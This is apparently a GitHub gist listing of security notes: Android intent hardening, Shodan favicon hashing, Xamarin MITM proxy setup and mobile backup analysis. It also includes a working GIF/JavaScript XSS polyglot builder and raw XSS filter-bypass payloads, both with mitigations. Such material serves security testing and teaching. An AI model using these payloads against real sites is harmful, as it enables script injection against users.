@yehgdotnet
yehgdotnet / gist:fef2f953170179a6637d4f02348d023f
Created April 22, 2020 06:01
Android: secure AppStore Launch (aka protocol takeover check)
// Any app that registers the market:// scheme can appear in the chooser for this intent (scheme takeover),
// so only Google Play (package com.android.vending) is allowed: resolve the intent, pin it to that component
// if installed, and otherwise fall back to the HTTPS Play Store URL.
public static void secureAppStoreLaunch(Context context) {
    String appId = context.getPackageName(); // you can also use BuildConfig.APPLICATION_ID
    Intent rateIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("market://details?id=" + appId));
    boolean marketFound = false;
    for (ResolveInfo info : context.getPackageManager().queryIntentActivities(rateIntent, 0)) {
        ActivityInfo ai = info.activityInfo;
        if ("com.android.vending".equals(ai.applicationInfo.packageName)) {
            rateIntent.setComponent(new ComponentName(ai.applicationInfo.packageName, ai.name));
            context.startActivity(rateIntent);
            marketFound = true;
            break;
        }
    }
    if (!marketFound) // Play Store not installed: open the store page in the browser instead
        context.startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("https://play.google.com/store/apps/details?id=" + appId)));
}
yehgdotnet / get-shodan-favicon-hash.py
Last active April 8, 2024 18:30
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3 requests
-----------------------------
# python 3 (the original gist targeted python 2). Shodan's http.favicon.hash is
# MurmurHash3 over the *line-wrapped* base64 of the favicon (76 chars per line,
# trailing newline), which is what python 2's str.encode('base64') produced;
# codecs.encode(..., 'base64') reproduces that wrapping, plain base64.b64encode does not.
import codecs
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = codecs.encode(response.content, 'base64')
print(mmh3.hash(favicon))  # signed 32-bit int, search Shodan with http.favicon.hash:<value>
yehgdotnet / web-request.sh
Created April 20, 2020 06:09
Bash Web Requester
#!/usr/bin/env bash
################################################################
# Bash Web Requester
# by Aung Khant, http://yehg.net
# License: GPL v2
#
# takes 2 arguments:
# first is a file with a list of URLs (e.g. http://site.com/test.asp)
# second is a file with a regexp-compatible pattern that is matched against each page's content to find keywords
yehgdotnet / ghdb.user.js
Last active April 18, 2020 13:52
TamperMonkey: Log lists of domain in Google search results
// ==UserScript==
// @name Log lists of domain in Google search results
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match https://www.google.com/search?q=*
// @grant none
// ==/UserScript==
yehgdotnet / xss2gif.py
Created December 1, 2019 12:41
XSS via valid gif
#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a GIF. ====================================================#
#======= or it creates a JavaScript Payload as a GIF. ====================================================#
#======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS IS NOT PEP 8 FORMATTED
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
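One way to build the GIF/JavaScript polyglot the header describes, added here as an example rather than the gist's own script: the logical-screen width bytes of a minimal but valid GIF89a are chosen to spell `/*`, so that when the same bytes are read as JavaScript they parse as `GIF89a/* ... */=1;alert(1);//...`, with the payload carried in a GIF comment extension. A small block walker confirms the GIF structure survives. The payload, byte layout and function names are assumptions.

```python
import struct

# Minimal valid 1x1 image: descriptor, 2-entry local colour table, LZW minimum
# code size 2, one data sub-block (clear, pixel 0, end-of-information), terminator.
_IMAGE = (b"\x2C" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x80"
          + b"\x00\x00\x00\xff\xff\xff"
          + b"\x02" + b"\x02\x44\x01" + b"\x00")


def build_xss_gif(js: str = "alert(1)") -> bytes:
    """Return bytes that are simultaneously a valid GIF89a and valid JavaScript.

    JavaScript view: GIF89a/*<rest of LSD, image, extension header>*/=1;<js>;//<rest>
    'GIF89a' is an identifier, width 0x2A2F ("/*" little-endian) opens a block
    comment, the comment-extension payload closes it and runs <js>, and '//'
    hides the remaining GIF bytes (block terminator and trailer).
    """
    payload = ("*/=1;%s;//" % js).encode("ascii")
    if len(payload) > 255:
        raise ValueError("a comment sub-block is limited to 255 bytes")
    if b"\n" in payload or b"\r" in payload:
        raise ValueError("a line terminator would end the trailing // comment")
    header = b"GIF89a"
    # Logical screen descriptor: width=0x2A2F ('/*'), height=1, no global colour table.
    lsd = struct.pack("<HHBBB", 0x2A2F, 1, 0x00, 0, 0)
    comment_ext = b"\x21\xFE" + bytes([len(payload)]) + payload + b"\x00"
    return header + lsd + _IMAGE + comment_ext + b"\x3B"


def walk_gif(data: bytes):
    """Walk the block structure; return ((width, height), block kinds, comment payloads).
    Raises ValueError on anything that is not a well-formed GIF data stream."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("bad signature")
    width, height, packed, _bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    pos = 13
    if packed & 0x80:  # global colour table present: 3 * 2^(N+1) bytes
        pos += 3 * (2 << (packed & 0x07))
    blocks, comments = [], []

    def sub_blocks(p):
        chunks = []
        while data[p] != 0:  # length-prefixed sub-blocks until a 0 terminator
            n = data[p]
            chunks.append(data[p + 1:p + 1 + n])
            p += 1 + n
        return b"".join(chunks), p + 1

    while True:
        tag = data[pos]
        if tag == 0x3B:  # trailer must be the last byte
            blocks.append("trailer")
            if pos != len(data) - 1:
                raise ValueError("data after trailer")
            return (width, height), blocks, comments
        if tag == 0x21:  # extension: label byte, then sub-blocks
            label = data[pos + 1]
            body, pos = sub_blocks(pos + 2)
            blocks.append("comment" if label == 0xFE else "extension")
            if label == 0xFE:
                comments.append(body)
        elif tag == 0x2C:  # image descriptor, optional local colour table, LZW data
            _l, _t, _w, _h, ipacked = struct.unpack("<HHHHB", data[pos + 1:pos + 10])
            pos += 10
            if ipacked & 0x80:
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1  # LZW minimum code size
            _, pos = sub_blocks(pos)
            blocks.append("image")
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (tag, pos))


if __name__ == "__main__":
    gif = build_xss_gif()
    print(walk_gif(gif))
    print(gif)
```

The file only becomes a problem when something executes it as script, typically an upload served from the application's own origin and referenced via `<script src="...">`. Serving uploads with their real image Content-Type together with `X-Content-Type-Options: nosniff` makes the browser refuse to run it as JavaScript, which is the practical fix on the defending side.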
<</div>script</div>>alert()<</div>/script</div>>
<</p>script</p>>alert()<</p>/script</p>>
<</h1>script</h1>>alert()<</h1>/script</h1>>
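What the three payloads above rely on, shown as an added example that is not part of the gist: a sanitiser that deletes closing tags (`</div>`, `</p>`, `</h1>`) splices the surrounding characters together and reassembles `<script>alert()</script>`. The regex sanitiser here is a constructed stand-in for such a filter, not any real library, and the hardened variant shows the usual fix of stripping to a fixed point and then escaping.

```python
import re

PAYLOADS = [
    "<</div>script</div>>alert()<</div>/script</div>>",
    "<</p>script</p>>alert()<</p>/script</p>>",
    "<</h1>script</h1>>alert()<</h1>/script</h1>>",
]


def strip_closing_tags(html: str) -> str:
    """Constructed naive sanitiser: removes closing tags in one pass.
    Each removal joins the characters around it, which is exactly the bug."""
    return re.sub(r"</[a-z][a-z0-9]*>", "", html, flags=re.I)


def strip_until_stable(html: str) -> str:
    """Hardened variant: strip all tags until nothing changes, then escape whatever
    is left so that nothing reassembled on the way can be parsed as markup."""
    prev = None
    while prev != html:
        prev, html = html, re.sub(r"</?[a-z][a-z0-9]*[^>]*>", "", html, flags=re.I)
    return html.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def bypasses(sanitizer) -> list:
    """Payloads that still yield a script tag after passing through `sanitizer`."""
    return [p for p in PAYLOADS if "<script>" in sanitizer(p).lower()]


if __name__ == "__main__":
    for p in PAYLOADS:
        print(repr(p), "->", repr(strip_closing_tags(p)))
    print("naive bypassed by:", len(bypasses(strip_closing_tags)))
    print("hardened bypassed by:", len(bypasses(strip_until_stable)))
```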
yehgdotnet / install_phpzip.md
Last active February 7, 2023 13:14
MAMP PRO for Mac OSX - Installing PHP ZIP extension

From Terminal

# install dependencies
brew install autoconf # required by pecl 
brew install libzip


# install the zip extension in your selected MAMP PHP version
ls /Applications/MAMP/bin/php/
https://mobile-security.gitbook.io/mobile-security-testing-guide/general-mobile-app-testing-guide/0x04f-testing-network-communication
Dealing with Xamarin
Xamarin is a mobile application development platform that is capable of producing native Android and iOS apps by using Visual Studio and C# as programming language.
When testing a Xamarin app, setting the system proxy in the Wi-Fi settings will not show any HTTP requests in your interception proxy, because apps created by Xamarin do not use the phone's local proxy settings. There are two ways to resolve this:
1. Add a default proxy to the app by adding the following code in the OnCreate() or Main() method and rebuild the app: WebRequest.DefaultWebProxy = new WebProxy("192.168.11.1", 8080);
2. Use ettercap to get a man-in-the-middle (MITM) position; see the section above on how to set up a MITM attack. Once in the MITM position we only need to redirect port 443 to our interception proxy running on localhost. This can be d
yehgdotnet / gist:397120706f5028c48924721bbbeee150
Created November 2, 2019 02:32
Mobile App Backup files analysis
Correct Backup Analysis Approach
Procedure for backup analysis
=============================
1. before app run (baseline backup)
2. during app run
3. post run
## Dumping SQLite
sqlite3 [db] ".dump"
#### Getting IP address:
In the Android emulator, run netcfg or ip addr to find the IP address.
#### Elevating Terminal app to Root Terminal
type: su
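The "Dumping SQLite" step carried a little further, as an added example that is not part of the notes: open a database copied out of an app backup read-only (so the evidence is not modified), emit the same SQL that `sqlite3 [db] ".dump"` prints, and flag tables or columns whose names suggest secrets so they can be diffed across the before-run, during-run and post-run snapshots. The sample schema is constructed in memory and the column-name heuristic is an assumption.

```python
import re
import sqlite3

# Names that usually mean a value worth looking at in a backup (assumed heuristic).
SENSITIVE = re.compile(r"(pass|pwd|secret|token|api_?key|session|auth|cred|pin)", re.I)


def open_backup_db(path: str) -> sqlite3.Connection:
    """Open a database file pulled from a backup in read-only mode."""
    return sqlite3.connect("file:%s?mode=ro" % path, uri=True)


def make_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for a database found in an app backup."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT);
        CREATE TABLE prefs (key TEXT, value TEXT);
        INSERT INTO users VALUES (1, 'alice@example.com', 'plaintext-oops');
        INSERT INTO prefs VALUES ('theme', 'dark');
        INSERT INTO prefs VALUES ('auth_token', 'eyJhbGciOi...constructed');
    """)
    return conn


def dump_sql(conn: sqlite3.Connection) -> list:
    """Equivalent of `sqlite3 db .dump`: schema and data as SQL statements."""
    return list(conn.iterdump())


def find_sensitive(conn: sqlite3.Connection) -> list:
    """Return (table, column_or_key, sample_value) for columns whose names look
    secret, plus rows of key/value tables (prefs, settings) whose key looks secret."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute('PRAGMA table_info("%s")' % table)]
        for col in cols:
            if SENSITIVE.search(col):
                row = conn.execute('SELECT "%s" FROM "%s" LIMIT 1' % (col, table)).fetchone()
                hits.append((table, col, row[0] if row else None))
        if {"key", "value"} <= set(cols):
            for key, value in conn.execute('SELECT key, value FROM "%s"' % table):
                if SENSITIVE.search(key):
                    hits.append((table, key, value))
    return hits


if __name__ == "__main__":
    db = make_sample_db()
    print("\n".join(dump_sql(db)))
    for hit in find_sensitive(db):
        print("SENSITIVE:", hit)
```

Run `find_sensitive(open_backup_db(path))` against each of the three snapshots and compare the results: a token that appears only in the during-run copy but persists in the post-run backup is the kind of finding the procedure above is meant to surface.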